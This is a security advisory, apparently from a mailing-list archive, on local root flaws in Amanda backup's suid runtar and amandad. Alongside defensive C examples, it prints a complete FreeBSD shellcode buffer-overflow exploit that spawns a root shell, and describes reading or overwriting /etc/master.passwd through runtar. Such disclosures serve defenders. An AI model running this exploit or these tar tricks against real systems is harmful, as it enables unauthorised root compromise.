Amanda backup local root compromises
--------------------------------------------------------------------------------


SUMMARY

The Amanda backup package comes with several UNIX distributions. This 
backup application suffers from several security vulnerabilities that 
allow local users to gain root privileges.

DETAILS

Vulnerable systems:
Amanda 2.3.0
Amanda 2.4.1
(Anyone running a suid version of runtar might be vulnerable as well)

Amanda's "runtar" program, suid root by default on FreeBSD 3.3, calls 
/usr/bin/tar and passes all arguments given to runtar to this program. Tar 
is thus run with root permissions and is vulnerable to all of the same 
attacks on suid programs that it would have if it were suid itself.


Vulnerability 1 - run tar as root

Since tar is run with root permissions, you are free to tar up any file 
you wish, including /etc/master.passwd, and read it back from the archive. 
You may also untar any file you wish to any location on the system, 
including over /etc/master.passwd. This does not require any exploit and 
may be done simply by supplying arguments to runtar (and thus to tar) as 
if you were root.


Vulnerability 1.1 - tar contains a buffer overflow

Obtaining root via buffer overflow here is redundant, of course, but it 
illustrates the point that even if tar's own capabilities could not be 
used to gain root privileges, the buffer overflow would still allow you to 
do so. An overflow exists in tar which will allow any user to execute 
commands as root.
Note that an overflow in tar is not an immediate security flaw on its own, 
since tar is not normally installed suid/sgid, but it goes to show that 
one should security-audit every program one calls from a privileged 
context with user-supplied input. By passing a long string to runtar in 
the form "/usr/local/libexec/amanda/runtar cvf $400bytes:bah" we can 
execute our commands. A FreeBSD exploit is attached below.
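The fix a wrapper like runtar needs is to stop forwarding arbitrary 
arguments to a root tar. The following is an added example of such an 
argument-allowlisting wrapper, written for this page to illustrate 
vulnerabilities 1 and 1.1 together; it is not Amanda's runtar or Amanda's 
later fix. The accepted command-line shape ("--create --file - ... ."), the 
option set, the /usr/bin/tar path and the function names are assumptions 
chosen for the illustration. The wrapper refuses any archive name other 
than "-" (stdout), which covers "-f /etc/master.passwd" from vulnerability 
1, and any unknown or over-long argument, which stops the 400-byte "cvf" 
string of vulnerability 1.1 before tar's option parser ever sees it.

```c
/* Added example: an argv-allowlisting suid wrapper around tar.
 * Not Amanda's code; paths and the accepted option set are assumptions. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Assumed, fixed path to the real tar; never taken from the caller. */
#define TAR_PATH   "/usr/bin/tar"
#define MAX_ARGS   16
#define MAX_ARGLEN 255

/* Options forwarded unchanged. This set is an assumption for the example,
 * not the list Amanda's client actually passes. */
static const char *const allowed_flags[] = {
    "--one-file-system", "--sparse", "--ignore-failed-read", "--totals", NULL
};

/* Options that take exactly one value; the value must pass value_ok(). */
static const char *const allowed_valued[] = {
    "--directory", "--listed-incremental", NULL
};

static int in_list(const char *const *list, const char *s)
{
    for (; *list; list++)
        if (strcmp(*list, s) == 0)
            return 1;
    return 0;
}

/* A value is an absolute path of bounded length, printable ASCII only,
 * with no ".." component. */
static int value_ok(const char *v)
{
    size_t n = strlen(v);
    if (n == 0 || n > MAX_ARGLEN || v[0] != '/')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)v[i];
        if (c < 0x21 || c > 0x7e)
            return 0;
    }
    if (strstr(v, "/../") != NULL || (n >= 3 && strcmp(v + n - 3, "/..") == 0))
        return 0;
    return 1;
}

/* Returns 1 only for a command line of the shape
 *     runtar --create --file - [options...] .
 * The archive is forced to stdout, so "-f /etc/master.passwd" and the
 * 400-byte "host:file" argument from the exploit are both rejected
 * before tar runs. */
int runtar_args_ok(int argc, char *const argv[])
{
    if (argc < 5 || argc > MAX_ARGS)
        return 0;
    if (strcmp(argv[1], "--create") != 0)
        return 0;
    if (strcmp(argv[2], "--file") != 0 || strcmp(argv[3], "-") != 0)
        return 0;
    for (int i = 4; i < argc - 1; i++) {
        if (strlen(argv[i]) > MAX_ARGLEN)
            return 0;
        if (in_list(allowed_flags, argv[i]))
            continue;
        if (in_list(allowed_valued, argv[i])) {
            /* the value must exist and must not be the trailing "." operand */
            if (i + 1 >= argc - 1 || !value_ok(argv[i + 1]))
                return 0;
            i++;
            continue;
        }
        return 0;   /* unknown option: refuse rather than forward */
    }
    return strcmp(argv[argc - 1], ".") == 0;
}

int main(int argc, char *argv[])
{
    if (!runtar_args_ok(argc, argv)) {
        fprintf(stderr, "runtar: refusing to run tar with these arguments\n");
        return 1;
    }
    /* Fixed path and an empty environment: the caller cannot choose which
     * tar runs or steer it through TAR_OPTIONS-style variables. */
    char *const envp[] = { NULL };
    argv[0] = "tar";
    execve(TAR_PATH, argv, envp);
    perror("execve");
    return 1;
}
```

The check runs before any privileged action, and it rejects rather than 
rewrites: an argument that does not match the allowlist is never handed to 
tar in any form. Whatever tar does with a 400-byte "host:file" string is 
then irrelevant to the security of the suid wrapper.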


Vulnerability 2 - symlink problem

Not quite as serious, but a concern nonetheless. When the amandad daemon 
runs, it writes a bin-owned file called "amandad.debug" in /tmp, following 
any symlink it finds at that name. By creating a symlink from 
/tmp/amandad.debug to any other file, we force amandad to clobber that 
file's contents with amandad's debug info. Note that amandad is not 
suid/sgid, but it is often run with root permissions at startup or via 
scripts, in which case the clobbered file can be any file on the system.
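To make the symlink problem concrete, and to show the open() flags that 
prevent it, here is an added example written for this page; it is not 
amandad's code, and amandad's actual open call is not quoted on this page. 
It builds a scratch directory under /tmp with a constructed victim file and 
a symlink named amandad.debug pointing at it, then compares the 
symlink-following open that a plain fopen(path, "w") performs against an 
open that uses O_EXCL and O_NOFOLLOW plus an fstat check. Paths, file 
contents and function names are constructed for the demonstration.

```c
/* Added example: symlink clobbering via a fixed debug-file name in /tmp,
 * beside a hardened open. Not amandad's code; paths are constructed. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: a debug file opened for writing by a
 * fixed name in a world-writable directory. open() follows a symlink at
 * that name, so whatever it points to is truncated and overwritten with
 * the opener's privileges. */
int open_debug_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened variant. O_CREAT|O_EXCL fails if anything already exists at
 * path (a symlink included), O_NOFOLLOW fails with ELOOP if the last
 * component is a symlink, and the fstat check confirms that what we hold
 * is a fresh regular file owned by us with no other links. Mode 0600 also
 * keeps other users from reading the debug output. Returns -1 on refusal. */
int open_debug_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != geteuid()) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Reproduces vulnerability 2 in a scratch directory (constructed data, not a
 * real amandad run): a victim file, a symlink named amandad.debug pointing
 * at it, then both opens. Returns 1 if the unsafe open clobbered the victim
 * while the safe open refused, 0 otherwise, -1 on setup error. */
int demo_symlink_clobber(void)
{
    char dir[] = "/tmp/amandad-demo-XXXXXX";
    if (mkdtemp(dir) == NULL) {
        /* fall back to the current directory if /tmp is not writable */
        strcpy(dir, "amandad-demo-XXXXXX");
        if (mkdtemp(dir) == NULL)
            return -1;
    }
    char victim[PATH_MAX], link[PATH_MAX];
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/amandad.debug", dir);

    FILE *f = fopen(victim, "w");
    if (f == NULL)
        return -1;
    fputs("original contents\n", f);          /* 18 bytes */
    fclose(f);
    if (symlink(victim, link) != 0)
        return -1;

    /* Safe open first: it must refuse and leave the victim untouched. */
    int fd = open_debug_safe(link);
    int safe_refused = (fd < 0 && (errno == ELOOP || errno == EEXIST));
    if (fd >= 0)
        close(fd);

    /* Unsafe open: follows the link and truncates the victim. */
    fd = open_debug_unsafe(link);
    if (fd >= 0) {
        (void)write(fd, "debug\n", 6);
        close(fd);
    }
    struct stat st;
    int clobbered = (stat(victim, &st) == 0 && st.st_size == 6);

    unlink(link);
    unlink(victim);
    rmdir(dir);
    return (clobbered && safe_refused) ? 1 : 0;
}

int main(void)
{
    int r = demo_symlink_clobber();
    printf("unsafe open clobbered victim, safe open refused: %s\n",
           r == 1 ? "yes" : "no");
    return r == 1 ? 0 : 1;
}
```

The flags close the hole at the open() call, but the durable fix is not to 
write debug output into a world-writable directory at all: a bin-owned 
directory with mode 0700 removes the attacker's ability to plant the 
symlink in the first place.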

The following exploit code can be used to test your system for the 
mentioned vulnerability:

/*
 * Amanda runtar exploit yields euid=0(root)
 * Actually overflows tar 1.11.2 (included in FreeBSD 3.3)
 * Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other
 * platforms
 *
 * Compile gcc -o amandax amandax.c
 * Run ./amandax <offset> <buflen>
 * keep buflen around 400, try positive and negative offsets
 *
 * Brock Tellier [EMAIL PROTECTED]
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* FreeBSD/x86 execve("/bin/sh") shellcode. It contains no NUL bytes, so it
 * survives being passed to runtar as a command-line argument. */
char fbsdshell[]= /* [EMAIL PROTECTED] */
  "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
  "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
  "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
  "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

#define LEN 400
#define NOP 0x90
#define ALIGN 3
#define OFFSET 0
#define ADDR 0xbfbfdd90 /* fbsd 3.3 */

int main(int argc, char *argv[]) {

  long int offset = OFFSET;

  int i;
  int buflen = LEN;
  long int addr = ADDR;
  char buf[LEN + 1];            /* +1 so the argument is always NUL-terminated */

  if (argc > 1) offset = atoi(argv[1]);
  if (argc > 2) buflen = atoi(argv[2]);
  if (argc > 3) {
    fprintf(stderr, "Usage: %s <offset> <buflen>\n", argv[0]);
    exit(0);
  }
  if (buflen > LEN) buflen = LEN;  /* never overrun our own buffer */

  fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n");
  fprintf(stderr, "Brock Tellier [EMAIL PROTECTED]\n");
  fprintf(stderr, "Using addr: 0x%lx\t buflen: %d\t offset: %ld\n",
          addr + offset, buflen, offset);

  /* NOP sled, shellcode at a fixed offset, then the guessed return address
   * repeated up to the end of the buffer. */
  memset(buf, NOP, buflen);
  memcpy(buf + 100, fbsdshell, strlen(fbsdshell));
  for (i = 100 + strlen(fbsdshell) + ALIGN; i < buflen - 4; i += 4)
    *(int *)&buf[i] = addr + offset;
  buf[buflen] = '\0';

  /* runtar hands its arguments straight to tar as root; the oversized
   * archive name in "cvf <buf> :bah" triggers the overflow in tar. */
  execl("/usr/local/libexec/amanda/runtar", "runtar", "cvf", buf, ":bah",
        NULL);

  perror("execl");              /* only reached if runtar could not be run */
  exit(1);
}


ADDITIONAL INFORMATION

This vulnerability and exploit code have been provided by Brock Tellier 
<mailto:[EMAIL PROTECTED]>.



-------

    this mailing list is supported by:
 >> http://www.indolinux.com - the Indonesian Linux world
 -------------------------------------------------------------------
 to unsubscribe, send email to [EMAIL PROTECTED]
 to see the list rules, send email to [EMAIL PROTECTED]
 the archive is at http://www.mail-archive.com/[email protected]
 
